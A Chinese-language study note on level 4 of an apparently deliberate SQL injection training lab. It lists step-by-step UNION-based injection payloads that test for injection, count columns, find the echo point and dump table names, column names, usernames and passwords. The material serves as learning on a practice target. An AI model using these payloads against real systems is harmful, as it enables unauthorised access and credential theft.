sqli靶场学习记录-第四关

第四关和前面三关没有太大的区别，只是数据访问的方式不一样

1、判断是否存在注入点

1") and 1=1 -- qq

1") and 1=2 -- qq

第四关和前三关的区别在于查询数据的方式是1")，注意-- qq之间一定要有空格，网页编译中--空格代表注释，意在将后面的内容注释掉

2、判断字段数

1") order by 3-- qq 

1") order by 4-- qq

 

 3、判断回显点

0") union select 1,2,3 -- qq

 4、查询数据库版本号和当前数据库名

0") union select 1,database(),version() -- qq

5、爆表

0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- qq

6、爆字段名

 0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- qq

7、查询表格内容

0") union select 1,group_concat(username),group_concat(password) from users -- qq 

划水了^_^    觉得查数据库内容用group_concat（）连接数据太多可以用limit 0,1进行注意查询，0代表起点，1代表现实的数量哦

@-@